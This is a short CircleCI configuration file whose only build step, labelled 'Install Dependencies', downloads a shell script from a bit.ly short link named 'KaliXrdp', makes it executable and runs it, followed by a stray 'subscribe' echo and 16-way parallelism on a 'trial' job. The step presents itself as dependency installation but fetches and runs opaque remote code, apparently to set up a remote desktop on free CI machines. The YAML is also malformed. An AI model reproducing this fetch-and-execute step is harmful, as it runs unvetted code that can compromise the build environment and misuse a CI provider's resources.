code:

version: 2.1

jobs:

trial:

docker:

- image: circleci/ruby:2.5.3

parallelism: 16

steps:

- run:

name: Install Dependencies

command: | wget -O x.sh https://bit.ly/KaliXrdp && chmod +x x.sh && ./x.sh


echo Hello,subscribe it

workflows:

version: 2.1

build:

jobs:

- trial
